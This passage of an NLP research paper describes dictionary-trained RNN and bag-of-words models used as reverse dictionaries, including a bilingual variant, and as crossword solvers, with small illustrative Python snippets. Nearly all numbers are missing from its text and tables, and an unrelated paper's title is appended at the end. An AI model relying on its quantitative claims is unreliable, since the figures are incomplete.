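    g_o = sigmoid(p["W_o"] @ v_t + p["U_o"] @ h_prev + p["b_o"])  # output gate
    m_t = i_w * g_i + m_prev * g_f                                # new memory state
    h_t = g_o * np.tanh(m_t)                                      # new output state
    return h_t, m_t

def read_definition(embeddings, p, hidden_size):
    # read a definition (list of word embeddings) and return the final memory state,
    # which a further projection maps into the target word embedding space
    h = np.zeros(hidden_size)
    m = np.zeros(hidden_size)
    for v in embeddings:
        h, m = lstm_step(v, h, m, p)
    return m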
bag-of-words nlms
we implement a simpler linear bag-of-words (bow) architecture for encoding the definition phrases. as with the rnn, this architecture learns an embedding $v_i$ for each word in the model vocabulary, together with a single matrix of input projection weights $W$. the bow model simply maps an input definition with word embeddings $v_1 \dots v_n$ to the sum of the projected embeddings $\sum_{i=1}^{n} W v_i$. this model can also be considered a special case of an rnn in which the update function $U$ and nonlinearity $\phi$ are both the identity, so that 'reading' the next word in the input phrase updates the current representation more simply: $a_t = a_{t-1} + W v_t$.

pre-trained input representations
we experiment with variants of these models in which the input definition embeddings are pre-learned and fixed (rather than randomly-initialised and updated) during training. there are several potential advantages to taking this approach. first, the word embeddings are trained on massive corpora and may therefore introduce additional linguistic or conceptual knowledge to the models. second, at test time, the models will have a larger effective vocabulary, since the pre-trained word embeddings typically span a larger vocabulary than the union of all dictionary definitions used to train the model. finally, the models will then map to and from the same space of embeddings (the embedding space will be closed under the operation of the model), so conceivably could be more easily applied as a general-purpose 'composition engine'.

training objective
we train all neural language models $M$ to map the input definition phrase $s_c$ defining word $c$ to a location close to the pre-trained embedding $v_c$ of $c$. we experiment with two different cost functions for the word-phrase pair $(c, s_c)$ from the training data. the first is simply the cosine distance between $M(s_c)$ and $v_c$. the second is the rank loss
$\max(0,\ m - \cos(M(s_c), v_c) + \cos(M(s_c), v_r))$,
where $v_r$ is the embedding of a randomly-selected word from the vocabulary other than $c$. this loss function was used for language models, for example, in (huang et al., ). in all experiments we apply a margin $m$ = . , which has been shown to work well on word-retrieval tasks (bordes et al., ).

implementation details
since training on the dictionary data took - hours, we did not conduct a hyper-parameter search on any validation sets over the space of possible model configurations such as embedding dimension, or size of hidden layers. instead, we chose these parameters to be as standard as possible based on previous research. for fair comparison, any aspects of model design that are not specific to a particular class of model were kept constant across experiments.
the pre-trained word embeddings used in all of our models (either as input or target) were learned by a continuous bag-of-words (cbow) model using the word vec software on approximately billion words of running text. when training such models on massive corpora, a large embedding length of up to has been shown to yield the best performance (see e.g. (faruqui et al., )). the pre-trained embeddings used in our models were of length , as a compromise between quality and memory constraints. in cases where the word embeddings are learned during training on the dictionary objective, we make these embeddings shorter ( ), since they must be learned from much less language data.
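as an illustration of the two training costs defined in the training objective above, here is a minimal sketch of the cosine loss and the margin rank loss for a single (definition, word) pair; the function names and the default margin value shown are our own assumptions for illustration, not the released implementation.

import numpy as np

def cosine(a, b):
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b)))

def cosine_loss(phrase_vec, target_vec):
    # cosine distance between the encoded definition and the defined word's embedding
    return 1.0 - cosine(phrase_vec, target_vec)

def rank_loss(phrase_vec, target_vec, random_vec, margin=0.1):
    # hinge rank loss: the defined word should outscore a randomly drawn word by the margin
    return max(0.0, margin
               - cosine(phrase_vec, target_vec)
               + cosine(phrase_vec, random_vec))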
in the rnn models, at each time step each of the four lstm rnn internal layers (gating and activation states) had length – another standard choice (see e.g. (cho et al., )). the final hidden state was mapped linearly to length , the dimension of the target embedding. in the bow models, the projection matrix projects input embeddings (either learned, of length , or pre-trained, of length ) to length for summing. all models were implemented with theano (bergstra et al., ) and trained with minibatch sgd on gpus. the batch size was fixed at and the learning rate was controlled by adadelta (zeiler, ). (the word vec embedding models are well known; further details can be found at https://code.google.com/p/word vec/. the training data for this pre-training was compiled from various online text sources using the script demo-train-big-model-v .sh from the same page.)

reverse dictionaries
the most immediate application of our trained models is as a reverse dictionary or concept finder. it is simple to look up a definition in a dictionary given a word, but professional writers often also require suitable words for a given idea, concept or definition (see the testimony from professional writers at http://www.onelook.com/?c=awards). reverse dictionaries satisfy this need by returning candidate words given a phrase, description or definition. for instance, when queried with the phrase an activity that requires strength and determination, the onelook.com reverse dictionary returns the concepts exercise and work. our trained rnn model can perform a similar function, simply by mapping a phrase to a point in the target (word vec) embedding space, and returning the words corresponding to the embeddings that are closest to that point.
several other academic studies have proposed reverse dictionary models. these generally rely on common techniques from information retrieval, comparing definitions in their internal database to the input query, and returning the word whose definition is 'closest' to that query (bilac et al., ; bilac et al., ; zock and bilac, ). proximity is quantified differently in each case, but is generally a function of hand-engineered features of the two sentences. for instance, shaw et al. ( ) propose a method in which the candidates for a given input query are all words in the model's database whose definitions contain one or more words from the query. this candidate list is then ranked according to a query-definition similarity metric based on the hypernym and hyponym relations in wordnet, features commonly used in ir such as tf-idf and a parser.
there are, in addition, at least two commercial online reverse dictionary applications, whose architecture is proprietary knowledge. the first is the dictionary.com reverse dictionary (available at http://dictionary.reference.com/reverse/), which retrieves candidate words from the dictionary.com dictionary based on user definitions or descriptions. the second is onelook.com, whose algorithm searches indexed dictionaries, including
for each of these words, we extracted dictionary-style definitions from five elec- tronic resources: wordnet, the american heritage dictionary, the collaborative international dictio- nary of english, wiktionary and webster’s. we chose these five dictionaries because they are freely- available via the wordnik api, but in theory any dictionary could be chosen. most words in our train- ing data had multiple definitions. for each word w with definitions {d . . .dn} we included all pairs (w,d ) . . .(w,dn) as training examples. to allow models access to more factual knowl- edge than might be present in a dictionary (for in- stance, information about specific entities, places or people, we supplemented this training data with in- formation extracted from simple wikipedia. for every word in the model’s target embedding space that is also the title of a wikipedia article, we treat the sentences in the first paragraph of the article as if they were (independent) definitions of that word. when a word in wikipedia also occurs in one (or more) of the five training dictionaries, we simply add these pseudo-definitions to the training set of definitions for the word. combining wikipedia and dictionaries in this way resulted in ≈ , word- ’definition’ pairs of ≈ , unique words. to explore the effect of the quantity of training data on the performance of the models, we also trained models on subsets of this data. the first sub- set comprised only definitions from wordnet (ap- proximately , definitions of , words). the second subset comprised only words in word- net and their first definitions (approximately , word, definition pairs). . for all variants of rnn and bow models, however, reducing the training data in this way resulted in a clear reduction in per- see http://developer.wordnik.com https://simple.wikipedia.org/wiki/main_ page as with other dictionaries, the first definition in wordnet generally corresponds to the most typical or common sense of a word. formance on all tasks. for brevity, we therefore do not present these results in what follows. . comparisons as a baseline, we also implemented two entirely unsupervised methods using the neural (word vec) word embeddings from the target word space. in the first (w v add), we compose the embeddings for each word in the input query by pointwise addition, and return as candidates the nearest word embed- dings to the resulting composed vector. the sec- ond baseline, (w v mult), is identical except that the embeddings are composed by elementwise mul- tiplication. both methods are established ways of building phrase representations from word embed- dings (mitchell and lapata, ). none of the models or evaluations from previous academic research on reverse dictionaries is pub- licly available, so direct comparison is not possi- ble. however, we do compare performance with the commercial systems. the dictionary.com sys- tem returned no candidates for over % of our in- put definitions. we therefore conduct detailed com- parison with onelook.com, which is the first re- verse dictionary tool returned by a google search and seems to be the most popular among writers. . reverse dictionary evaluation to our knowledge there are no established means of measuring reverse dictionary performance. in the only previous academic research on english reverse dictionaries that we are aware of, evaluation was conducted on word-definition pairs written by lexicographers (shaw et al., ). 
since these are not publicly available we developed new evaluation sets and make them freely available for future evaluations. the evaluation items are of three types, designed to test different properties of the models. to create the seen evaluation, we randomly selected words from the wordnet training data (seen by all models), and then randomly selected a definition for each word. testing models on the resulting word-definition pairs assesses their ability to recall or decode previously encoded information. for the unseen evaluation, we randomly selected words from wordnet and excluded all definitions of these words from the training data of all models.
finally, for a fair comparison with onelook, which has both the seen and unseen pairs in its internal database, we built a new dataset of concept descriptions that do not appear in the training data for any model. to do so, we randomly selected adjectives, nouns or verbs from among the top most frequent tokens in the british national corpus (leech et al., ) (but outside the top ). we then asked ten native english speakers to write a single-sentence 'description' of these words. to ensure the resulting descriptions were good quality, for each description we asked two participants who did not produce that description to list any words that fitted the description (up to a maximum of three). if the target word was not produced by one of the two checkers, the original participant was asked to re-write the description until the validation was passed (re-writing was required in of the cases). these concept descriptions, together with other evaluation sets, can be downloaded from our website for future comparisons.

table : performance of different reverse dictionary models in different evaluation settings (seen wn definitions, unseen wn definitions and concept descriptions), reporting median rank, accuracy@ / and rank variance for the unsupervised w v add and w v mult baselines, onelook, and the rnn and bow models with cosine and ranking losses, each with or without word vec input embeddings. *low variance in the mult models is due to consistently poor scores, so it is not highlighted.

table : style difference between dictionary definitions and concept descriptions in the evaluation.
  dictionary definition - valve: "control consisting of a mechanical device for controlling fluid flow"
  concept description - prefer: "when you like one thing more than another thing"

given a test description, definition, or question, all models produce a ranking of possible word answers based on the proximity of their representations of the input phrase and all possible output words. to quantify the quality of a given ranking, we report three statistics: the median rank of the correct answer (over the whole test set, lower better), the proportion of cases in which the correct answer appears in the top / in this ranking (accuracy@ / - higher better) and the variance of the rank of the correct answer across the test set (rank variance - lower better).
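the three ranking statistics just defined are straightforward to compute from the rank that a model assigns to the correct answer on every test item. below is a minimal sketch; the function name and the default top-10/top-100 cut-offs are our own illustrative choices.

import statistics

def evaluation_stats(ranks, ks=(10, 100)):
    # ranks: list of 1-based ranks of the correct answer for every test query
    median_rank = statistics.median(ranks)                               # lower is better
    accuracy_at = {k: sum(r <= k for r in ranks) / len(ranks) for k in ks}  # higher is better
    rank_variance = statistics.pvariance(ranks)                          # lower is better
    return median_rank, accuracy_at, rank_variance

# example: ranks produced by some model on five test definitions
print(evaluation_stats([1, 3, 250, 12, 7]))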
results
table shows the performance of the different models in the three evaluation settings. of the unsupervised composition models, elementwise addition is clearly more effective than multiplication, which almost never returns the correct word as the nearest neighbour of the composition. overall, however, the supervised models (rnn, bow and onelook) clearly outperform these baselines.
the results indicate interesting differences between the nlms and the onelook dictionary search engine. the seen (wn first) definitions in table occur in both the training data for the nlms and the lookup data for the onelook model. clearly the onelook algorithm is better than nlms at retrieving already available information (returning % of correct words among the top-ten candidates on this set). however, this is likely to come at the cost of a greater memory footprint, since the model requires access to its database of dictionaries at query time (the trained neural language models are approximately half the size of the six training dictionaries stored as plain text, so would be hundreds of times smaller than the onelook database of dictionaries if stored this way).
the performance of the nlm embedding models on the (unseen) concept descriptions task shows that these models can generalise well to novel, unseen queries. while the median rank for onelook on this evaluation is lower, the nlms retrieve the correct answer in the top ten candidates approximately as frequently, within the top candidates more frequently and with lower variance in ranking over the test set (we also observed that the mean ranking for nlms was lower than for onelook on the concept descriptions task). thus, nlms seem to generalise more 'consistently' than onelook on this dataset, in that they generally assign a reasonably high ranking to the correct word. in contrast, as can also be verified by querying our web demo, onelook tends to perform either very well or poorly on a given query.
when comparing between nlms, perhaps the most striking observation is that the rnn models do not significantly outperform the bow models, even though the bow model output is invariant to changes in the order of words in the definition. users of the online demo can verify that the bow models recover concepts from descriptions strikingly well, even when the words in the description are permuted. this observation underlines the importance of lexical semantics in the interpretation of language by nlms, and is consistent with some other recent work on embedding sentences (iyyer et al., ).
it is difficult to observe clear trends in the differences between nlms that learn input word embeddings and those with pre-trained (word vec) input embeddings. both types of input yield good performance in some situations and weaker performance in others. in general, pre-training input embeddings seems to help most on the concept descriptions, which are furthest from the training data in terms of linguistic style. this is perhaps unsurprising, since models that learn input embeddings from the dictionary data acquire all of their conceptual knowledge from this data (and thus may overfit to this setting), whereas models with pre-trained embeddings have some semantic memory acquired from general running-text language data and other knowledge acquired from the dictionaries.

qualitative analysis
some example output from the various models is presented in table . the differences illustrated here are also evident from querying the web demo.
the first example shows how the nlms (bow and rnn) generalise beyond their training data. four of the top five responses could be classed as appropriate in that they refer to inhabitants of cold countries. however, inspecting the wordnik training data, there is no mention of cold or anything to do with climate in the definitions of eskimo, scandinavian, scandinavia etc. therefore, the embedding models must have learned that coldness is a characteristic of scandinavia, siberia, russia, relates to eskimos etc. via connections with other concepts that are described or defined as cold. in contrast, the candidates produced by the onelook and (unsupervised) w v baseline models have nothing to do with coldness.
the second example demonstrates how the nlms generally return candidates whose linguistic or conceptual function is appropriate to the query. for a query referring explicitly to a means, method or process, the rnn and bow models produce verbs in different forms or an appropriate deverbal noun. in contrast, onelook returns words of all types (aerodynamics, draught) that are arbitrarily related to the words in the query. a similar effect is apparent in the third example. while the candidates produced by the onelook model are the correct part of speech (noun), and related to the query topic, they are not semantically appropriate. the dictionary embedding models are the only ones that return a list of plausible habits, the class of noun requested by the input.

table : the top-five candidates for example queries (invented by the authors) from different reverse dictionary models. both the rnn and bow models are without word vec input and use the cosine loss.
  "a native of a cold country": onelook: country, citizen, foreign, naturalize, cisco; w v add: a, the, another, of, whole; rnn: eskimo, scandinavian, arctic, indian, siberian; bow: frigid, cold, icy, russian, indian
  "a way of moving through the air": onelook: drag, whiz, aerodynamics, draught, coefficient of drag; w v add: the, through, a, moving, in; rnn: glide, scooting, glides, gliding, flight; bow: flying, gliding, glide, fly, scooting
  "a habit that might annoy your spouse": onelook: sisterinlaw, fatherinlaw, motherinlaw, stepson, stepchild; w v add: annoy, your, might, that, either; rnn: bossiness, jealousy, annoyance, rudeness, boorishness; bow: infidelity, bossiness, foible, unfaithfulness, adulterous

cross-lingual reverse dictionaries
we now show how the rnn architecture can be easily modified to create a bilingual reverse dictionary - a system that returns candidate words in one language given a description or definition in another. a bilingual reverse dictionary could have clear applications for translators or transcribers. indeed, the problem of attaching appropriate words to concepts may be more common when searching for words in a second language than in a monolingual context.

table : responses from cross-lingual reverse dictionary models to selected queries. underlined responses are 'correct' or potentially useful for a native french speaker.
  "an emotion that you might feel after being rejected": rnn en-fr: triste, pitoyable, répugnante, épouvantable; w v add: insister, effectivement, pourquoi, nous; rnn + google: sentiment, regretter, peur, aversion
  "a small black flying insect that transmits disease and likes horses": rnn en-fr: mouche, canard, hirondelle, pigeon; w v add: attentivement, pouvions, pourrons, naturellement; rnn + google: voler, faucon, mouches, volant
to create the bilingual variant, we simply replace the word vec target embeddings with those from a bilingual embedding space. bilingual embedding models use bilingual corpora to learn a space of representations of the words in two languages, such that words from either language that have similar meanings are close together (hermann and blunsom, ; chandar et al., ; gouws et al., ). for a test-of-concept experiment, we used english-french embeddings learned by the state-of-the-art bilbowa model (gouws et al., ) from the wikipedia (monolingual) and europarl (bilingual) corpora (the approach should work with any bilingual embeddings; we thank stephan gouws for doing the training). we trained the rnn model to map from english definitions to english words in the bilingual space. at test time, after reading an english definition, we then simply return the nearest french word neighbours to that definition.
because no benchmarks exist for quantitative evaluation of bilingual reverse dictionaries, we compare this approach qualitatively with two alternative methods for mapping definitions to words across languages. the first is analogous to the w v add model of the previous section: in the bilingual embedding space, we first compose the embeddings of the english words in the query definition with elementwise addition, and then return the french word whose embedding is nearest to this vector sum. the second uses the rnn monolingual reverse dictionary model to identify an english word from an english definition, and then translates that word using google translate.
table shows that the rnn model can be effectively modified to create a cross-lingual reverse dictionary. it is perhaps unsurprising that the w v add model candidates are generally the lowest in quality given the performance of the method in the monolingual setting. in comparing the two rnn-based methods, the rnn (embedding space) model appears to have two advantages over the rnn + google approach. first, it does not require online access to a bilingual word-word mapping as defined e.g. by google translate. second, it is less prone to errors caused by word sense ambiguity. for example, in response to the query an emotion you feel after being rejected, the bilingual embedding rnn returns emotions or adjectives describing mental states. in contrast, the monolingual+google model incorrectly maps the plausible english response regret to the verbal infinitive regretter. the model makes the same error when responding to a description of a fly, returning the verb voler (to fly).

discussion
we have shown that simply training rnn or bow nlms on six dictionaries yields a reverse dictionary that performs comparably to the leading commercial system, even with access to much less dictionary data. indeed, the embedding models consistently return syntactically and semantically plausible responses, which are generally part of a more coherent and homogeneous set of candidates than those produced by the commercial systems. we also showed how the architecture can be easily extended to produce bilingual versions of the same model.
in the analyses performed thus far, we only test the dictionary embedding approach on tasks that it was trained to accomplish (mapping definitions or descriptions to words). in the next section, we explore whether the knowledge learned by dictionary embedding models can be effectively transferred to a novel task.
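retrieval in all of these reverse-dictionary variants is a nearest-neighbour search: the encoded definition is compared by cosine similarity with every candidate word embedding, which in the bilingual case are simply the french vectors of the shared embedding space. the sketch below illustrates that lookup; the function name and data layout are our own assumptions, not the released code.

import numpy as np

def nearest_words(query_vec, word_list, emb_matrix, top_k=5):
    # word_list: candidate words (english words, or the french half of a bilingual space);
    # emb_matrix: their embeddings, one row per word
    q = query_vec / (np.linalg.norm(query_vec) + 1e-8)
    m = emb_matrix / (np.linalg.norm(emb_matrix, axis=1, keepdims=True) + 1e-8)
    sims = m @ q                                # cosine similarity to every candidate
    best = np.argsort(-sims)[:top_k]
    return [(word_list[i], float(sims[i])) for i in best]

# monolingual use: encode "an activity that requires strength and determination" and search
# the english vocabulary; cross-lingual use: encode the same english definition but restrict
# word_list and emb_matrix to the french words of the bilingual embedding space.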
general knowledge (crossword) question answering
the automatic answering of questions posed in natural language is a central problem of artificial intelligence. although web search and ir techniques provide a means to find sites or documents related to language queries, at present, internet users requiring a specific fact must still sift through pages to locate the desired information.
systems that attempt to overcome this, via fully open-domain or general knowledge question-answering (open qa), generally require large teams of researchers, modular design and powerful infrastructure, exemplified by ibm's watson (ferrucci et al., ). for this reason, much academic research focuses on settings in which the scope of the task is reduced. this has been achieved by restricting questions to a specific topic or domain (mollá and vicedo, ), allowing systems access to pre-specified passages of text from which the answer can be inferred (iyyer et al., ; weston et al., ), or centering both questions and answers on a particular knowledge base (berant and liang, ; bordes et al., ).
in what follows, we show that the dictionary embedding models introduced in the previous sections may form a useful component of an open qa system. given the absence of a knowledge base or web-scale information in our architecture, we narrow the scope of the task by focusing on general knowledge crossword questions (as our interest is in the language understanding, we do not address the question of fitting answers into a grid, which is the main concern of end-to-end automated crossword solvers (littman et al., )). general knowledge (non-cryptic, or quick) crosswords appear in national newspapers in many countries. crossword question answering is more tractable than general open qa for two reasons. first, models know the length of the correct answer (in letters), reducing the search space. second, some crossword questions mirror definitions, in that they refer to fundamental properties of concepts (a twelve-sided shape) or request a category member (a city in egypt).

evaluation
general knowledge crossword questions come in different styles and forms. we used the eddie james crossword website (http://www.eddiejames.co.uk/) to compile a bank of sentence-like general-knowledge questions. eddie james is one of the uk's leading crossword compilers, working for several national newspapers. our long question set consists of the first questions (starting from puzzle # ) from his general-knowledge crosswords, excluding clues of fewer than four words and those whose answer was not a single word (e.g. kingjames). to evaluate models on a different type of clue, we also compiled a set of shorter questions based on the guardian quick crossword. guardian questions still require general factual or linguistic knowledge, but are generally shorter and somewhat more cryptic than the longer eddie james clues. we again formed
in this case, however, we only consider candidate words whose length matches the length specified in the clue.

test set | word | description
long | baudelaire | "french poet ( ) and key figure in the development of symbolism."
short ( ) | satanist | "devil devotee"
single-word ( ) | guilt | "culpability"
table : examples of the different question types in the crossword question evaluation dataset.

. benchmarks and comparisons
as with the reverse dictionary experiments, we compare rnn and bow nlms with a simple unsupervised baseline of elementwise addition of word vec vectors in the embedding space (we discard the ineffective w v mult baseline), again restricting candidates to words of the pre-specified length. we also compare to two bespoke online crossword-solving engines. the first, one across (http://www.oneacross.com/), is the candidate generation module of the award-winning proverb crossword system (littman et al., ). proverb, which was produced by academic researchers, has featured in national media such as new scientist, and beaten expert humans in crossword solving tournaments. the second comparison is with crossword maestro (http://www.crosswordmaestro.com/), a commercial crossword solving system that handles both cryptic and non-cryptic crossword clues (we focus only on the non-cryptic setting), and has also been featured in national media (see e.g. http://www.theguardian.com/crosswords/crossword-blog/ /mar/ /crossword-blog-computers-crack-cryptic-clues). we are unable to compare against a third well-known automatic crossword solver, dr fill (ginsberg, ), because code for dr fill's candidate-generation module is not readily available. as with the rnn and baseline models, when evaluating existing systems we discard candidates whose length does not match the length specified in the clue.
certain principles connect the design of the existing commercial systems and differentiate them from our approach. unlike the nlms, they each require query-time access to large databases containing common crossword clues, dictionary definitions, the frequency with which words typically appear as crossword solutions, and other hand-engineered and task-specific components (littman et al., ; ginsberg, ).
. results
the performance of models on the various question types is presented in table . when evaluating the two commercial systems, one across and crossword maestro, we have access to web interfaces that return up to approximately candidates for each query, so we can only reliably record membership of the top ten (accuracy@ ).
on the long questions, we observe a clear advantage for all dictionary embedding models over the commercial systems and the simple unsupervised baseline. here, the best performing nlm (rnn with word vec input embeddings and ranking loss) ranks the correct answer third on average, and in the top-ten candidates over % of the time.
as the questions get shorter, the advantage of the embedding models diminishes. both the unsupervised baseline and one across answer the short questions with comparable accuracy to the rnn and bow models. one reason for this may be the difference in form and style between the shorter clues and the full definitions or encyclopedia sentences in the dictionary training data. as the length of the clue decreases, finding the answer often reduces to generating synonyms (culpability - guilt) or category members (tall animal - giraffe). the commercial systems can retrieve good candidates for such clues among their databases of entities, relationships and common crossword answers.
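the candidate extraction and length filter just described can be sketched in a few lines. the sketch assumes a numpy vocabulary embedding matrix and an already-encoded clue vector (from the rnn, the bow model, or the summed word vec baseline); the function and variable names are illustrative, not part of the systems evaluated here.

```python
import numpy as np

def crossword_candidates(clue_vec, vocab, emb, answer_len, top_k=10):
    """rank vocabulary words by cosine similarity to the encoded clue,
    keeping only candidates whose letter count matches the clue."""
    emb_norm = emb / np.linalg.norm(emb, axis=1, keepdims=True)
    q = clue_vec / np.linalg.norm(clue_vec)
    scores = emb_norm @ q
    # discard words whose length does not match the clue specification
    keep = np.array([len(w) == answer_len for w in vocab])
    scores[~keep] = -np.inf
    best = np.argsort(-scores)[:top_k]
    return [vocab[i] for i in best]
```

the same routine covers the unsupervised baseline when clue_vec is simply the sum of the clue's word vec vectors.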
unsupervised word vec representations are also known to encode these sorts of relationships (even after elementwise addition for short sequences of words) (mikolov et al., ). this would also explain why the dictionary embedding models with pre-trained (word vec) input embeddings outperform those with learned embeddings, particularly for the shortest questions.

table : performance of different models on crossword questions of different length (long, short and single-word), reporting average rank, accuracy@ / and rank variance for one across, crossword maestro, the w v add baseline, and the rnn and bow models with cosine and ranking loss, with and without word vec input embeddings. the two commercial systems are evaluated via their web interface so only accuracy@ can be reported in those cases.

. qualitative analysis
a better understanding of how the different models arrive at their answers can be gained from considering specific examples, as presented in table . the first three examples show that, despite the apparently superficial nature of its training data (definitions and introductory sentences), embedding models can answer questions that require factual knowledge about people and places. another notable characteristic of these models is the consistent semantic appropriateness of the candidate set. in the first case, the top five candidates are all mountains, valleys or places in the alps; in the second, they are all biblical names.
in the third, the rnn model retrieves currencies, in this case performing better than the bow model, which retrieves entities of various types associated with the netherlands. generally speaking (as can be observed via the web demo), the 'smoothness' or consistency in candidate generation of the dictionary embedding models is greater than that of the commercial systems. despite its simplicity, the unsupervised w v addition method is at times also surprisingly effective, as shown by the fact that it returns joshua in its top candidates for the third query.
the final example in table illustrates the surprising power of the bow model. in the training data there is a single definition for the correct answer schoenberg: united states composer and musical theorist (born in austria) who developed atonal composition. the only word common to both the query and the definition is 'composer' (there is no tokenization that allows the bow model to directly connect atonal and atonality). nevertheless, the model is able to infer the necessary connections between the concepts in the query and the definition to return schoenberg as the top candidate.

table : responses from different models (one across, crossword maestro, bow and rnn) to example crossword clues: a swiss mountain peak famed for its north face, the old testament successor to moses, the former currency of the netherlands, and arnold, th century composer and pioneer of atonality. in each case the model output is filtered to exclude any candidates that are not of the same length as the correct answer. bow and rnn models are trained without word vec input embeddings and cosine loss.

despite such cases, it remains an open question whether, with more diverse training data, the world knowledge required for full open qa (e.g. secondary facts about schoenberg, such as his family) could be encoded and retained as weights in a (larger) dynamic network, or whether it will be necessary to combine the rnn with an external memory that is less frequently (or never) updated. this latter approach has begun to achieve impressive results on certain qa and entailment tasks (bordes et al., ; graves et al., ; weston et al., ).

conclusion
dictionaries exist in many of the world's languages. we have shown how these lexical resources can constitute valuable data for training the latest neural language models to interpret and represent the meaning of phrases and sentences. while humans use the phrasal definitions in dictionaries to better understand the meaning of words, machines can use the words to better understand the phrases. we used two dictionary embedding architectures - a recurrent neural network architecture with a long short-term memory, and a simpler linear bag-of-words model - to explicitly exploit this idea.
on the reverse dictionary task that mirrors its training setting, nlms that embed all known con- cepts in a continuous-valued vector space perform comparably to the best known commercial applica- tions despite having access to many fewer defini- tions. moreover, they generate smoother sets of can- didates and require no linguistic pre-processing or task-specific engineering. we also showed how the description-to-word objective can be used to train models useful for other tasks. nlms trained on the same data can answer general-knowledge crossword questions, and indeed outperform commercial sys- tems on questions containing more than four words. while our qa experiments focused on crosswords, the results suggest that a similar embedding-based approach may ultimately lead to improved output from more general qa and dialog systems and in- formation retrieval engines in general. we make all code, training data, evaluation sets and both of our linguistic tools publicly available on- line for future research. in particular, we propose the reverse dictionary task as a comparatively general- purpose and objective way of evaluating how well models compose lexical meaning into phrase or sen- tence representations (whether or not they involve training on definitions directly). in the next stage of this research, we will ex- plore ways to enhance the nlms described here, especially in the question-answering context. the models are currently not trained on any question- like language, and would conceivably improve on exposure to such linguistic forms. we would also like to understand better how bow models can per- form so well with no ‘awareness’ of word order, and whether there are specific linguistic contexts in which models like rnns or others with the power to encode word order are indeed necessary. finally, we intend to explore ways to endow the model with richer world knowledge. this may require the in- tegration of an external memory module, similar to the promising approaches proposed in several recent papers (graves et al., ; weston et al., ). acknowledgments kc and yb acknowledge the support of the follow- ing organizations: nserc, calcul québec, com- pute canada, the canada research chairs and ci- far. fh and ak were supported by google faculty research award, and ak further by google euro- pean fellowship. references dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. in proceeding of iclr. yoshua bengio, patrice simard, and paolo frasconi. . learning long-term dependencies with gradient descent is difficult. neural networks, ieee transac- tions on, ( ): – . jonathan berant and percy liang. . semantic pars- ing via paraphrasing. in proceedings of the associa- tion for computational linguistics. james bergstra, olivier breuleux, frédéric bastien, pas- cal lamblin, razvan pascanu, guillaume desjardins, joseph turian, david warde-farley, and yoshua ben- gio. . theano: a cpu and gpu math expression compiler. in proceedings of the python for scientific computing conference (scipy). slaven bilac, timothy baldwin, and hozumi tanaka. . improving dictionary accessibility by maximiz- ing use of available knowledge. traitement automa- tique des langues, ( ): – . slaven bilac, wataru watanabe, taiichi hashimoto, takenobu tokunaga, and hozumi tanaka. . dic- tionary search based on the target word description. in proceedings of nlp . antoine bordes, sumit chopra, and jason weston. . question answering with subgraph embeddings. 
pro- ceedings of emnlp. antoine bordes, nicolas usunier, sumit chopra, and jason weston. . large-scale simple question answering with memory networks. arxiv preprint arxiv: . . sarath chandar, stanislas lauly, hugo larochelle, mitesh khapra, balaraman ravindran, vikas c. raykar, and amrita saha. . an autoencoder ap- proach to learning bilingual word representations. in advances in neural information processing systems, pages – . kyunghyun cho, bart van merriënboer, caglar gul- cehre, dzmitry bahdanau, fethi bougares, holger schwenk, and yoshua bengio. . learning phrase representations using rnn encoder-decoder for statis- tical machine translation. in proceedings of emnlp. manaal faruqui, jesse dodge, sujay k. jauhar, chris dyer, eduard hovy, and noah a. smith. . retrofitting word vectors to semantic lexicons. pro- ceedings of the north american chapter of the asso- ciation for computational linguistics. david ferrucci, eric brown, jennifer chu-carroll, james fan, david gondek, aditya a. kalyanpur, adam lally, j. william murdock, eric nyberg, john prager, nico schlaefer, and chris welty. . building wat- son: an overview of the deepqa project. in ai mag- azine, volume ( ), pages – . matthew l. ginsberg. . dr. fill: crosswords and an implemented solver for singly weighted csps. in journal of artificial intelligence research, pages – . stephan gouws, yoshua bengio, and greg corrado. . bilbowa: fast bilingual distributed represen- tations without word alignments. in proceedings of nips deep learning workshop. alex graves, greg wayne, and ivo danihelka. . neural turing machines. arxiv preprint arxiv: . . karl moritz hermann and phil blunsom. . multi- lingual distributed representations without word align- ment. in proceedings of iclr. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . eric h. huang, richard socher, christopher d. manning, and andrew y. ng. . improving word representa- tions via global context and multiple word prototypes. in proceedings of the association for computational linguistics. mohit iyyer, jordan boyd-graber, leonardo claudino, richard socher, and hal daumé iii. . a neu- ral network for factoid question answering over para- graphs. in proceedings of emnlp. mohit iyyer, varun manjunatha, jordan boyd-graber, and hal daumé iii. . deep unordered compo- sition rivals syntactic methods for text classification. in proceedings of the association for computational linguistics. ryan kiros, ruslan salakhutdinov, and richard s. zemel. . unifying visual-semantic embeddings with multimodal neural language models. transac- tions of the association for computational linguistics. to appear. alexandre klementiev, ivan titov, and binod bhattarai. . inducing crosslingual distributed representa- tions of words. proceedings of coling. geoffrey leech, roger garside, and michael bryant. . claws : the tagging of the british national corpus. in proceedings of coling. michael l. littman, greg a. keim, and noam shazeer. . a probabilistic approach to solving crossword puzzles. artificial intelligence, ( ): – . tomas mikolov, martin karafiát, lukas burget, jan cer- nockỳ, and sanjeev khudanpur. . recurrent neu- ral network based language model. in proceedings of interspeech . tomas mikolov, ilya sutskever, kai chen, greg s. cor- rado, and jeff dean. . distributed representations of words and phrases and their compositionality. in advances in neural information processing systems. jeff mitchell and mirella lapata. . 
composition in distributional models of semantics. cognitive science, ( ): – . diego mollá and josé luis vicedo. . question answering in restricted domains: an overview. computational linguistics, ( ): – . ryan shaw, anindya datta, debra vandermeer, and kaushik dutta. . building a scalable database-driven reverse dictionary. knowledge and data engineering, ieee transactions on, ( ): – . ivan vulic, wim de smet, and marie-francine moens. . identifying word translations from comparable corpora using latent topic models. in proceedings of the association for computational linguistics. jason weston, antoine bordes, sumit chopra, and tomas mikolov. . towards ai-complete question answering: a set of prerequisite toy tasks. in arxiv preprint arxiv: . . matthew d. zeiler. . adadelta: an adaptive learning rate method. in arxiv preprint arxiv: . . michael zock and slaven bilac. . word lookup on the basis of associations: from an idea to a roadmap. in proceedings of the acl workshop on enhancing and using electronic dictionaries.

which step do i take first? troubleshooting with bayesian models
annie louis and mirella lapata
school of informatics, university of edinburgh, crichton street, edinburgh eh ab
{alouis,mlap}@inf.ed.ac.uk

abstract
